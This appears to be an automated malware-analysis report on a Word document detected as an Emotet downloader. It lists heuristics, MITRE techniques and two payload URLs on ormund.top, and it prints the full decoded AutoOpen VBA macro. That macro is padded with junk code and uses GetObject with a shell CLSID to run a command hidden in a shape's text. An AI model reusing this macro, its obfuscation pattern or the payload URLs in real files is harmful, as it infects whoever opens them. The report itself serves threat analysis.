MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a legacy WordBasic AutoOpen macro that executes a heavily obfuscated command-line invocation of cmd.exe. This command attempts to download and execute payloads from the URLs http://ormund.top/template.js and http://ormund.top/template2.js. The ClamAV detection name 'Doc.Downloader.Emotet-6826477-0' strongly suggests the Emotet family.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6826477-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826477-0
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set HrNwjAuwj = GetObject(YzziCSu + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + zjsYjrf) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ormund.top/template.js In document text (OLE body)
- http://ormund.top/template2.jsIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7562 bytes |
SHA-256: 74d59230bd2d2632b9f958975b157c2636b8f5dcb6531ea331d8baa740a6923f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
125 of 194 identifiers look randomly generated (e.g. 'ipMzpJJBsHrJ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ipMzpJJBsHrJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case FwARI
Case 52894881
IVJnQPd = 170826284
YRYMT = CLng(291795350)
Case 336605701
znkZP = Oct(KiEoLKpZ)
wtFNb = Ornfd
Case 323796832
THqMwtRV = CDate(CskzFMb)
OLzLbS = Int(90831657 * Xzlvwtm)
End Select
On Error Resume Next
Select Case DuVpA
Case 24395197
kizrtfMz = 241745098
TTrFOr = CLng(253474196)
Case 264266640
HvZjtqJ = Oct(EErqJ)
BzUji = mRmSnzlJA
Case 273228892
iBdwp = CDate(uGAjVI)
tXKQpIuII = Int(315323274 * qJGvuEAJ)
End Select
On Error Resume Next
Select Case fEjjSTIi
Case 234130372
AfibRjYF = 98427542
oiLKq = CLng(136849787)
Case 180170728
vRYYPW = Oct(HNDsai)
wrJwn = MwPOSNtwt
Case 162874747
zrsnRObQM = CDate(KTUMo)
ljTBrj = Int(228351386 * wCKGB)
End Select
On Error Resume Next
Select Case adUqAXI
Case 144344223
kzcLzh = 44561040
DOnnCNBG = CLng(336880974)
Case 266732914
bjhDzu = Oct(flGZR)
HCSRP = FutUrf
Case 313766121
YQTjBjwuk = CDate(viQwB)
aiwhjzu = Int(240962174 * kiShLqXBD)
End Select
Set SWYiKM = Shapes("lLwkbcjCaXN")
On Error Resume Next
Select Case tzPOZV
Case 11403504
hqowToSAP = 129279133
nTFzVChEb = CLng(320582280)
Case 136369665
BSHuUhD = Oct(vXoMEj)
FfnHEPUs = oAuMsRaBM
Case 101508437
fMuwTLzA = CDate(fttoSc)
ooQLjaJ = Int(38625904 * nrciwm)
End Select
On Error Resume Next
Select Case jdHhjAuDw
Case 45886442
pGWpHUrr = 284809349
TliaEDHjj = CLng(279981090)
Case 135984907
rSawjq = Oct(nbSzAk)
mbVTvB = DQscHc
Case 322742772
TNQQZODP = CDate(oBXEP)
liqlQ = Int(212240076 * PvTCoB)
End Select
On Error Resume Next
Select Case lcXIX
Case 274258287
CGOmmihfa = 100546139
bFhUE = CLng(24372280)
Case 239294175
zmFOS = Oct(iZQEO)
QLJEp = HtCwoaUv
Case 96150915
TQXUYMpI = CDate(svfIERaMI)
PvcfQvqHB = Int(325159386 * tXsqGzj)
End Select
On Error Resume Next
Select Case NhzMkK
Case 173593913
kmwrz = 68633052
XtwIZ = CLng(8155166)
Case 10130706
fhGmM = Oct(JuHKdQw)
LlISrUI = rpprzB
Case 95041034
RJLXRiiYO = CDate(asrjTtK)
hMzHJ = Int(216142232 * QpQzU)
End Select
RaJXSq = "" + RtUEbFj + EOtPXLW + SWYiKM.TextFrame.TextRange.Text + pNatC + wTCrKzf + amzoiv
On Error Resume Next
Select Case hnswEQ
Case 197232485
cfJUB = 290787514
EtfEdJj = CLng(314993159)
Case 311619512
UHasz = Oct(hEhiOXczq)
uQXkSn = QVoIVZK
Case 11991069
zqkIDQdkb = CDate(UOKhQi)
OOPYKm = Int(211763034 * KXKmMiX)
End Select
On Error Resume Next
Select Case PDjmME
Case 126163578
pCniIFQ = 245217382
ptQXdS = CLng(220255847)
Case 305667599
bHLKi = Oct(TsNpKhlK)
UvkTuM = nwJwIUo
Case 250268057
BrHcLQfU = CDate(PQrab)
DizDhhOz = Int(290128835 * UMAmd)
End Select
On Error Resume Next
Select Case IpdtDc
Case 119652815
zUzOHPA = 247324148
rOkTpEbS = CLng(166973873)
Case 211257429
nnqXUIjO = Oct(oVous)
wzLtbwf = FFLzSkBb
Case 197579710
fkMiZuwfm = CDate(sVapaSGi)
jEoHD = Int(242020985 * IJRdzM)
End Select
On Error Resume Next
Select Case cruzX
Case 209449386
ZQjFh = 19254013
KGvuGs = CLng(280243040)
Case 113056610
MiOQvsTz = Oct(zIIoj)
DmGNpHjb = BCustdY
Case 62892519
JhRIPG = CDate(wiAjuCWW)
qUmdbZ = Int(211918466 * oPszb)
End Select
On Error Resume Next
Select Case YGaijA
Case 27427107
PcqKKEs = 235487811
jwFYvo = CLng(162471075)
Case 146569710
zbQhWwfb = Oct(EkzSwUrr)
MHmXOUj = LGudRCHDD
Case 185689063
hGufiT = CDate(zORzkjDS)
OtZNvA = Int(150117270 * YhHmipOt)
End Select
Set HrNwjAuwj = GetObject(YzziCSu + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + zjsYjrf)
On Error Resume Next
Select Case iiSDYv
Case 315692207
QHjOuWJ = 104537123
ROCmDBm = CLng(195183687)
Case 88767583
fYfQwSkau = Oct(vXNHEH)
jrRNzci = hZhidfaL
Case 29014982
AkrjwK = CDate(OzbuBvhwf)
mwdiv = Int(326599528 * PsCvRkV)
End Select
On Error Resume Next
Select Case zXuHjkto
Case 28821488
GMzjBjBu = 74259262
AJadGYcr = CLng(323525474)
Case 129182705
VZAzLGsi = Oct(WYUJuFm)
MLzNPnln = RAHHCrkzl
Case 254779418
kpcILmNbo = CDate(iBmtfl)
YGmPLO = Int(274024887 * aRThkJJSn)
End Select
Const QwWHRLtrfw = 0
On Error Resume Next
Select Case twwzdBLs
Case 122483075
kzYLBmcwm = 312622351
WoLtuh = CLng(284789800)
Case 209545130
DiFjHGFqf = Oct(AiwWNzSA)
IMsiwd = HnEiUUM
Case 160540123
CtsEujlTF = CDate(cYSwvcjcX)
KzHCkwRl = Int(321057548 * jWZaLD)
End Select
On Error Resume Next
Select Case NTLhw
Case 220376932
wjRdr = 342291972
mPAJna = CLng(155023319)
Case 54858670
QwaQhnvak = Oct(ElcCYlLui)
jfApsNCqd = niFWulWRb
Case 75163866
qsBvjJMb = CDate(bftSNlv)
XUkEzpBa = Int(212011795 * InOuT)
End Select
On Error Resume Next
Select Case ioISjcYM
Case 177166775
jovzz = 16553402
CDktkA = CLng(210230592)
Case 222572642
jmmWfUaZ = Oct(DiZTHj)
fhnPFnMa = oVDmzo
Case 188643686
uwmaEXOO = CDate(juYqjvB)
FSsSjt = Int(170124206 * KrwWmS)
End Select
HrNwjAuwj.Run@ RaJXSq, QwWHRLtrfw
On Error Resume Next
Select Case YTKZtRXO
Case 53397894
uhcJIAnm = 203220234
uowYOM = CLng(113576967)
Case 338242736
NFDFu = Oct(YYrmFdvcV)
wjJJz = UfTsj
Case 141849434
KjzYEudq = CDate(iSkbwAZ)
wMcPRjHpK = Int(80226448 * XmBHCljF)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.